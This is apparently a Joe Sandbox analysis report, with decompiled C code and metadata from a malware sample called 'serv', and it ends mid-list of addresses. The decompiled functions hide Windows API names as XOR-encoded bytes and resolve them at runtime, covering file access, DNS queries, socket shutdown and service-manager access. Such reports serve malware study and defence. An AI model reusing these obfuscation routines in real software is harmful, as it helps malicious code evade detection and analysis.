                                                                    0x0041cd63
                                                                    0x0041cd68
                                                                    0x0041cd6c
                                                                    0x0041cd71
                                                                    0x0041cd76
                                                                    0x0041cd7b
                                                                    0x0041cd7f
                                                                    0x0041cd84
                                                                    0x0041cd88
                                                                    0x0041cd8d
                                                                    0x0041cd90
                                                                    0x0041cd90
                                                                    0x0041cd94
                                                                    0x0041cd95
                                                                    0x0041cda6
                                                                    0x0041cda6
                                                                    0x0041cdc4
                                                                    0x0041cdc9

                                                                    APIs
                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?), ref: 0041CDC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: InformationToken
                                                                    • String ID: D$Y$`$d$f$k$l
                                                                    • API String ID: 4114910276-652578173
                                                                    • Opcode ID: 5dcd6caafda48195a7143808963921941d45b2b963cf4a5d3eaf3e582be202be
                                                                    • Instruction ID: 7def42bec187e1484ff266950f5acf8630221303d3b86c56375e3e0998d74be4
                                                                    • Opcode Fuzzy Hash: 5dcd6caafda48195a7143808963921941d45b2b963cf4a5d3eaf3e582be202be
                                                                    • Instruction Fuzzy Hash: AF11F46100C3C0AED302DB69988469BBFE25BA6608F08CD9DE0C887243D27AD648C777
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D870(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				struct HINSTANCE__* _t14;
                                                                    				intOrPtr _t17;
                                                                    				void* _t21;
                                                                    				intOrPtr _t25;
                                                                    				_Unknown_base(*)()* _t27;
                                                                    				CHAR* _t29;
                                                                    
                                                                    				_t14 =  *0x447fa4; // 0x6f3c0000
                                                                    				if(_t14 != 0) {
                                                                    					L6:
                                                                    					_t27 = GetProcAddress(_t14, _a4);
                                                                    					if(_t27 == 0) {
                                                                    						_t17 =  *0x447d7c; // 0x1
                                                                    						if(_t17 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t27;
                                                                    				} else {
                                                                    					 *_t29 = 0x54;
                                                                    					_v5 = 0x54;
                                                                    					_v4 = 0x5c;
                                                                    					_v3 = 0x5c;
                                                                    					_v11 = 0x5e;
                                                                    					_v10 = 0x43;
                                                                    					_v9 = 0x51;
                                                                    					_v8 = 0x40;
                                                                    					_v7 = 0x59;
                                                                    					_v6 = 0x1e;
                                                                    					_v2 = 0x30;
                                                                    					_t21 = 0;
                                                                    					goto L2;
                                                                    					L2:
                                                                    					_t29[_t21] = _t29[_t21] ^ 0x00000030;
                                                                    					_t21 = _t21 + 1;
                                                                    					if(_t21 < 0xb) {
                                                                    						goto L2;
                                                                    					} else {
                                                                    						_t14 = LoadLibraryA(_t29); // executed
                                                                    						 *0x447fa4 = _t14;
                                                                    						if(_t14 == 0) {
                                                                    							_t25 =  *0x447d7c; // 0x1
                                                                    							if(_t25 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t14 =  *0x447fa4; // 0x6f3c0000
                                                                    							}
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}



















                                                                    0x0041d870
                                                                    0x0041d87a
                                                                    0x0041d8e7
                                                                    0x0041d8f4
                                                                    0x0041d8f8
                                                                    0x0041d8fa
                                                                    0x0041d901
                                                                    0x0041d905
                                                                    0x0041d905
                                                                    0x0041d901
                                                                    0x0041d910
                                                                    0x0041d87c
                                                                    0x0041d87e
                                                                    0x0041d881
                                                                    0x0041d887
                                                                    0x0041d88b
                                                                    0x0041d88f
                                                                    0x0041d894
                                                                    0x0041d899
                                                                    0x0041d89e
                                                                    0x0041d8a3
                                                                    0x0041d8a8
                                                                    0x0041d8ad
                                                                    0x0041d8b2
                                                                    0x0041d8b2
                                                                    0x0041d8b4
                                                                    0x0041d8b4
                                                                    0x0041d8b8
                                                                    0x0041d8bc
                                                                    0x00000000
                                                                    0x0041d8be
                                                                    0x0041d8c2
                                                                    0x0041d8ca
                                                                    0x0041d8cf
                                                                    0x0041d8d1
                                                                    0x0041d8d9
                                                                    0x0041d8dd
                                                                    0x0041d8e2
                                                                    0x0041d8e2
                                                                    0x0041d8d9
                                                                    0x00000000
                                                                    0x0041d8cf
                                                                    0x0041d8bc

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(00000001), ref: 0041D8C2
                                                                    • GetProcAddress.KERNEL32(6F3C0000,?), ref: 0041D8EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: 0$@$C$Q$Y$^
                                                                    • API String ID: 2574300362-2069776461
                                                                    • Opcode ID: b127cf3ec14fa61f5905a082a36a0fdcb9f1affb5cc5e41b75bb8c5ca9011163
                                                                    • Instruction ID: 8cedf1f6df1d03ae25ba189cba42f6d3f91eb78cbf465b8f5c166923f929695d
                                                                    • Opcode Fuzzy Hash: b127cf3ec14fa61f5905a082a36a0fdcb9f1affb5cc5e41b75bb8c5ca9011163
                                                                    • Instruction Fuzzy Hash: 83113D74A0D3809ED712EB79A81479B7FE55F52744F04886EE4E88B342D278C948C7AB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041B2D0(CHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				void* _t22;
                                                                    				void* _t24;
                                                                    				char* _t34;
                                                                    
                                                                    				if( *0x447e4c == 0) {
                                                                    					_v10 = 0x61;
                                                                    					_v7 = 0x61;
                                                                    					_v3 = 0x61;
                                                                    					 *_t34 = 0x47;
                                                                    					_v11 = 0x76;
                                                                    					_v9 = 0x65;
                                                                    					_v8 = 0x70;
                                                                    					_v6 = 0x42;
                                                                    					_v5 = 0x6d;
                                                                    					_v4 = 0x68;
                                                                    					_v2 = 0x45;
                                                                    					_v1 = 4;
                                                                    					_t24 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t24) =  *(_t34 + _t24) ^ 0x00000004;
                                                                    						_t24 = _t24 + 1;
                                                                    					} while (_t24 < 0xc);
                                                                    					 *0x447e4c = E0041A600(_t34);
                                                                    				}
                                                                    				_t22 = CreateFileA(_a4, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                    				return _t22;
                                                                    			}

















                                                                    0x0041b2da
                                                                    0x0041b2de
                                                                    0x0041b2e2
                                                                    0x0041b2e6
                                                                    0x0041b2ea
                                                                    0x0041b2ee
                                                                    0x0041b2f3
                                                                    0x0041b2f8
                                                                    0x0041b2fd
                                                                    0x0041b302
                                                                    0x0041b307
                                                                    0x0041b30c
                                                                    0x0041b311
                                                                    0x0041b316
                                                                    0x0041b318
                                                                    0x0041b318
                                                                    0x0041b31c
                                                                    0x0041b31d
                                                                    0x0041b32e
                                                                    0x0041b32e
                                                                    0x0041b356
                                                                    0x0041b35b

                                                                    APIs
                                                                    • CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B356
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: B$E$e$h$m$p$v
                                                                    • API String ID: 823142352-890941293
                                                                    • Opcode ID: 1cb5274a05bb758bdb30b7e49f64677e4cbe72a1414d72b7daf56c78a1aae5bd
                                                                    • Instruction ID: 5ffc414e4524d8812c80a38cc8b34097e4f1f70708f5ae5c9670413b653ca607
                                                                    • Opcode Fuzzy Hash: 1cb5274a05bb758bdb30b7e49f64677e4cbe72a1414d72b7daf56c78a1aae5bd
                                                                    • Instruction Fuzzy Hash: C41118A110C380AAD301DB69D944B0BBBE55BEA708F04CA9DF5CC87252D679E918C76B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041D920(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				intOrPtr* _t19;
                                                                    				void* _t20;
                                                                    				CHAR* _t28;
                                                                    
                                                                    				_t19 =  *0x447fa8;
                                                                    				if(_t19 == 0) {
                                                                    					 *_t28 = 2;
                                                                    					_v11 = 0x28;
                                                                    					_v10 = 0x35;
                                                                    					_v9 = 0x17;
                                                                    					_v8 = 0x33;
                                                                    					_v7 = 0x23;
                                                                    					_v6 = 0x34;
                                                                    					_v5 = 0x3f;
                                                                    					_v4 = 0x19;
                                                                    					_v3 = 7;
                                                                    					_v2 = 0x46;
                                                                    					do {
                                                                    						 *(_t28 + _t19) =  *(_t28 + _t19) ^ 0x00000046;
                                                                    						_t19 = _t19 + 1;
                                                                    					} while (_t19 < 0xb);
                                                                    					_t19 = E0041D870(_t28);
                                                                    					 *0x447fa8 = _t19;
                                                                    				}
                                                                    				_t20 =  *_t19(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t20;
                                                                    			}
















                                                                    0x0041d920
                                                                    0x0041d92a
                                                                    0x0041d92c
                                                                    0x0041d930
                                                                    0x0041d935
                                                                    0x0041d93a
                                                                    0x0041d93f
                                                                    0x0041d944
                                                                    0x0041d949
                                                                    0x0041d94e
                                                                    0x0041d953
                                                                    0x0041d958
                                                                    0x0041d95d
                                                                    0x0041d962
                                                                    0x0041d962
                                                                    0x0041d966
                                                                    0x0041d967
                                                                    0x0041d970
                                                                    0x0041d978
                                                                    0x0041d978
                                                                    0x0041d99b
                                                                    0x0041d9a0

                                                                    APIs
                                                                    • DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 0041D99B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Query_
                                                                    • String ID: #$($3$4$5$?$F
                                                                    • API String ID: 428220571-3447632621
                                                                    • Opcode ID: 9700a76494435f5e449bd86ee348fa38a48771e150e0fe18d0ce62c9a8a3f10f
                                                                    • Instruction ID: e241f35c53fc4e47d3b0237fb3b885c2067e695d016f8218ff5825d69a7a3f43
                                                                    • Opcode Fuzzy Hash: 9700a76494435f5e449bd86ee348fa38a48771e150e0fe18d0ce62c9a8a3f10f
                                                                    • Instruction Fuzzy Hash: 180109A050C3C0AAD302D768D448B1BBBE56BDA308F48C95DF0C897282D6BDD649C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E0041DEC0(intOrPtr _a4, intOrPtr _a8) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				intOrPtr* _t13;
                                                                    				void* _t14;
                                                                    				CHAR* _t18;
                                                                    
                                                                    				_t13 =  *0x447fd4;
                                                                    				if(_t13 == 0) {
                                                                    					 *_t18 = 0x6b;
                                                                    					_v11 = 0x70;
                                                                    					_v10 = 0x6d;
                                                                    					_v9 = 0x6c;
                                                                    					_v8 = 0x7c;
                                                                    					_v7 = 0x77;
                                                                    					_v6 = 0x6f;
                                                                    					_v5 = 0x76;
                                                                    					_v4 = 0x18;
                                                                    					do {
                                                                    						 *(_t18 + _t13) =  *(_t18 + _t13) ^ 0x00000018;
                                                                    						_t13 = _t13 + 1;
                                                                    					} while (_t13 < 9);
                                                                    					_t13 = E0041DA50(_t18);
                                                                    					 *0x447fd4 = _t13;
                                                                    				}
                                                                    				_t14 =  *_t13(_a4, _a8); // executed
                                                                    				return _t14;
                                                                    			}














                                                                    0x0041dec0
                                                                    0x0041deca
                                                                    0x0041decc
                                                                    0x0041ded0
                                                                    0x0041ded5
                                                                    0x0041deda
                                                                    0x0041dedf
                                                                    0x0041dee4
                                                                    0x0041dee9
                                                                    0x0041deee
                                                                    0x0041def3
                                                                    0x0041def8
                                                                    0x0041def8
                                                                    0x0041defc
                                                                    0x0041defd
                                                                    0x0041df06
                                                                    0x0041df0e
                                                                    0x0041df0e
                                                                    0x0041df1d
                                                                    0x0041df22

                                                                    APIs
                                                                    • shutdown.WS2_32(?,?,0041950C,00000000,00000000), ref: 0041DF1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: shutdown
                                                                    • String ID: l$m$o$p$v$w$|
                                                                    • API String ID: 2510479042-1936230277
                                                                    • Opcode ID: 22ff6506aabff7c244b77ad5f4110843774fb6b47c8920471d4e472404087db9
                                                                    • Instruction ID: 1740ba402668f5664a090bb8e0aa1abf40bc26f032a5decb80edc4e07fad6e29
                                                                    • Opcode Fuzzy Hash: 22ff6506aabff7c244b77ad5f4110843774fb6b47c8920471d4e472404087db9
                                                                    • Instruction Fuzzy Hash: 88F03CA480C3C099E301D728D548B6BBFD55BA6748F08C86CE4D987252D3BE955DC377
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t35;
                                                                    				struct HINSTANCE__* _t38;
                                                                    				void* _t40;
                                                                    				intOrPtr _t47;
                                                                    				signed int _t50;
                                                                    				intOrPtr _t52;
                                                                    				signed int _t63;
                                                                    				signed int _t64;
                                                                    				long _t68;
                                                                    				intOrPtr* _t78;
                                                                    				long _t79;
                                                                    				struct _OSVERSIONINFOA* _t85;
                                                                    				signed int _t87;
                                                                    				void* _t90;
                                                                    				struct _OSVERSIONINFOA* _t91;
                                                                    
                                                                    				_push(0x60);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				E00422920(0x94, __ecx, 0x4303a8);
                                                                    				 *(_t90 - 0x18) = _t91;
                                                                    				_t85 = _t91;
                                                                    				_t85->dwOSVersionInfoSize = 0x94;
                                                                    				GetVersionExA(_t85);
                                                                    				_t68 = _t85->dwPlatformId;
                                                                    				 *0x448268 = _t68;
                                                                    				_t35 = _t85->dwMajorVersion;
                                                                    				 *0x448274 = _t35;
                                                                    				_t79 = _t85->dwMinorVersion;
                                                                    				 *0x448278 = _t79;
                                                                    				_t87 = _t85->dwBuildNumber & 0x00007fff;
                                                                    				 *0x44826c = _t87;
                                                                    				if(_t68 != 2) {
                                                                    					 *0x44826c = _t87 | 0x00008000;
                                                                    				}
                                                                    				 *0x448270 = (_t35 << 8) + _t79;
                                                                    				_t38 = GetModuleHandleA(0);
                                                                    				if(_t38->i != 0x5a4d) {
                                                                    					L6:
                                                                    					 *(_t90 - 0x1c) = 0;
                                                                    				} else {
                                                                    					_t78 =  *((intOrPtr*)(_t38 + 0x3c)) + _t38;
                                                                    					if( *_t78 != 0x4550) {
                                                                    						goto L6;
                                                                    					} else {
                                                                    						_t63 =  *(_t78 + 0x18) & 0x0000ffff;
                                                                    						if(_t63 == 0x10b) {
                                                                    							__eflags =  *((intOrPtr*)(_t78 + 0x74)) - 0xe;
                                                                    							if( *((intOrPtr*)(_t78 + 0x74)) <= 0xe) {
                                                                    								goto L6;
                                                                    							} else {
                                                                    								_t64 = 0;
                                                                    								__eflags =  *(_t78 + 0xe8);
                                                                    								goto L11;
                                                                    							}
                                                                    						} else {
                                                                    							if(_t63 == 0x20b) {
                                                                    								__eflags =  *((intOrPtr*)(_t78 + 0x84)) - 0xe;
                                                                    								if( *((intOrPtr*)(_t78 + 0x84)) <= 0xe) {
                                                                    									goto L6;
                                                                    								} else {
                                                                    									_t64 = 0;
                                                                    									__eflags =  *(_t78 + 0xf8);
                                                                    									L11:
                                                                    									_t14 = __eflags != 0;
                                                                    									__eflags = _t14;
                                                                    									 *(_t90 - 0x1c) = _t64 & 0xffffff00 | _t14;
                                                                    								}
                                                                    							} else {
                                                                    								goto L6;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				if(E00424675(1) == 0) {
                                                                    					_push(0x1c);
                                                                    					E00422C4B(_t39, 0);
                                                                    				}
                                                                    				_t40 = E00423D97();
                                                                    				_t101 = _t40;
                                                                    				if(_t40 == 0) {
                                                                    					_push(0x10);
                                                                    					E00422C4B(_t40, 0);
                                                                    				}
                                                                    				E0042739A(_t101);
                                                                    				 *(_t90 - 4) = 0;
                                                                    				if(E0042719C() < 0) {
                                                                    					E00422C26(0x1b);
                                                                    				}
                                                                    				 *0x44c29c = GetCommandLineA();
                                                                    				 *0x4480e0 = E0042707A();
                                                                    				if(E00426FD8() < 0) {
                                                                    					E00422C26(8);
                                                                    				}
                                                                    				if(E00426DA5() < 0) {
                                                                    					E00422C26(9);
                                                                    				}
                                                                    				_t47 = E004253F0(1);
                                                                    				 *((intOrPtr*)(_t90 - 0x28)) = _t47;
                                                                    				if(_t47 != 0) {
                                                                    					E00422C26(_t47);
                                                                    				}
                                                                    				 *(_t90 - 0x44) = 0;
                                                                    				GetStartupInfoA(_t90 - 0x70);
                                                                    				 *((intOrPtr*)(_t90 - 0x20)) = E00426D48();
                                                                    				if(( *(_t90 - 0x44) & 0x00000001) == 0) {
                                                                    					_t50 = 0xa;
                                                                    				} else {
                                                                    					_t50 =  *(_t90 - 0x40) & 0x0000ffff;
                                                                    				}
                                                                    				_push(_t50);
                                                                    				_t52 = L00413C60(GetModuleHandleA(0), 0,  *((intOrPtr*)(_t90 - 0x20)));
                                                                    				_t83 = _t52;
                                                                    				 *((intOrPtr*)(_t90 - 0x2c)) = _t52;
                                                                    				if( *(_t90 - 0x1c) == 0) {
                                                                    					E0042551D(_t83);
                                                                    				}
                                                                    				E0042553F();
                                                                    				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                                                    				return E00424267(_t83);
                                                                    			}


















                                                                    0x00422c6f
                                                                    0x00422c76
                                                                    0x00422c82
                                                                    0x00422c87
                                                                    0x00422c8a
                                                                    0x00422c8c
                                                                    0x00422c8f
                                                                    0x00422c95
                                                                    0x00422c98
                                                                    0x00422c9e
                                                                    0x00422ca1
                                                                    0x00422ca6
                                                                    0x00422ca9
                                                                    0x00422cb2
                                                                    0x00422cb8
                                                                    0x00422cc1
                                                                    0x00422cc9
                                                                    0x00422cc9
                                                                    0x00422cd4
                                                                    0x00422ce2
                                                                    0x00422ce9
                                                                    0x00422d0a
                                                                    0x00422d0a
                                                                    0x00422ceb
                                                                    0x00422cee
                                                                    0x00422cf6
                                                                    0x00000000
                                                                    0x00422cf8
                                                                    0x00422cf8
                                                                    0x00422d01
                                                                    0x00422d22
                                                                    0x00422d26
                                                                    0x00000000
                                                                    0x00422d28
                                                                    0x00422d28
                                                                    0x00422d2a
                                                                    0x00000000
                                                                    0x00422d2a
                                                                    0x00422d03
                                                                    0x00422d08
                                                                    0x00422d0f
                                                                    0x00422d16
                                                                    0x00000000
                                                                    0x00422d18
                                                                    0x00422d18
                                                                    0x00422d1a
                                                                    0x00422d30
                                                                    0x00422d30
                                                                    0x00422d30
                                                                    0x00422d33
                                                                    0x00422d33
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00422d08
                                                                    0x00422d01
                                                                    0x00422cf6
                                                                    0x00422d40
                                                                    0x00422d42
                                                                    0x00422d44
                                                                    0x00422d49
                                                                    0x00422d4a
                                                                    0x00422d4f
                                                                    0x00422d51
                                                                    0x00422d53
                                                                    0x00422d55
                                                                    0x00422d5a
                                                                    0x00422d5b
                                                                    0x00422d60
                                                                    0x00422d6a
                                                                    0x00422d6e
                                                                    0x00422d73
                                                                    0x00422d7a
                                                                    0x00422d84
                                                                    0x00422d90
                                                                    0x00422d94
                                                                    0x00422d99
                                                                    0x00422da1
                                                                    0x00422da5
                                                                    0x00422daa
                                                                    0x00422dad
                                                                    0x00422db3
                                                                    0x00422db8
                                                                    0x00422dbb
                                                                    0x00422dc0
                                                                    0x00422dc1
                                                                    0x00422dc8
                                                                    0x00422dd3
                                                                    0x00422dda
                                                                    0x00422de4
                                                                    0x00422ddc
                                                                    0x00422ddc
                                                                    0x00422ddc
                                                                    0x00422de5
                                                                    0x00422dee
                                                                    0x00422df3
                                                                    0x00422df5
                                                                    0x00422dfb
                                                                    0x00422dfe
                                                                    0x00422dfe
                                                                    0x00422e03
                                                                    0x00422e35
                                                                    0x00422e43

                                                                    APIs
                                                                    • GetVersionExA.KERNEL32(?,004303A8,00000060), ref: 00422C8F
                                                                    • GetModuleHandleA.KERNEL32(00000000,?,004303A8,00000060), ref: 00422CE2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModuleVersion
                                                                    • String ID: Mqt`7utIqt
                                                                    • API String ID: 3651626284-2786406774
                                                                    • Opcode ID: 468f6f0264c1f8661a56af585a2e7deff08955a6ad12e88501f7798046568b96
                                                                    • Instruction ID: bf21261726a03d434cab0292fedb3a1e14e8891f35a5115cf40d0211426e89a4
                                                                    • Opcode Fuzzy Hash: 468f6f0264c1f8661a56af585a2e7deff08955a6ad12e88501f7798046568b96
                                                                    • Instruction Fuzzy Hash: 51218DB1B107349BDB20AFB6BD1565E7BB4BF45304F50452EE804A7261DBBC9842CB9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D0A0(char* _a4, char* _a8, int _a12) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t21;
                                                                    				void* _t23;
                                                                    				CHAR* _t31;
                                                                    
                                                                    				if( *0x447f50 == 0) {
                                                                    					_v9 = 0x79;
                                                                    					_v7 = 0x79;
                                                                    					 *_t31 = 0x57;
                                                                    					_v15 = 0x68;
                                                                    					_v14 = 0x7d;
                                                                    					_v13 = 0x76;
                                                                    					_v12 = 0x4b;
                                                                    					_v11 = 0x5b;
                                                                    					_v10 = 0x55;
                                                                    					_v8 = 0x76;
                                                                    					_v6 = 0x7f;
                                                                    					_v5 = 0x7d;
                                                                    					_v4 = 0x6a;
                                                                    					_v3 = 0x59;
                                                                    					_v2 = 0x18;
                                                                    					_t23 = 0;
                                                                    					do {
                                                                    						 *(_t31 + _t23) =  *(_t31 + _t23) ^ 0x00000018;
                                                                    						_t23 = _t23 + 1;
                                                                    					} while (_t23 < 0xf);
                                                                    					 *0x447f50 = E0041C580(_t31);
                                                                    				}
                                                                    				_t21 = OpenSCManagerA(_a4, _a8, _a12); // executed
                                                                    				return _t21;
                                                                    			}




















                                                                    0x0041d0aa
                                                                    0x0041d0b2
                                                                    0x0041d0b6
                                                                    0x0041d0ba
                                                                    0x0041d0be
                                                                    0x0041d0c3
                                                                    0x0041d0c7
                                                                    0x0041d0cb
                                                                    0x0041d0d0
                                                                    0x0041d0d5
                                                                    0x0041d0da
                                                                    0x0041d0de
                                                                    0x0041d0e3
                                                                    0x0041d0e7
                                                                    0x0041d0ec
                                                                    0x0041d0f1
                                                                    0x0041d0f6
                                                                    0x0041d0f8
                                                                    0x0041d0f8
                                                                    0x0041d0fc
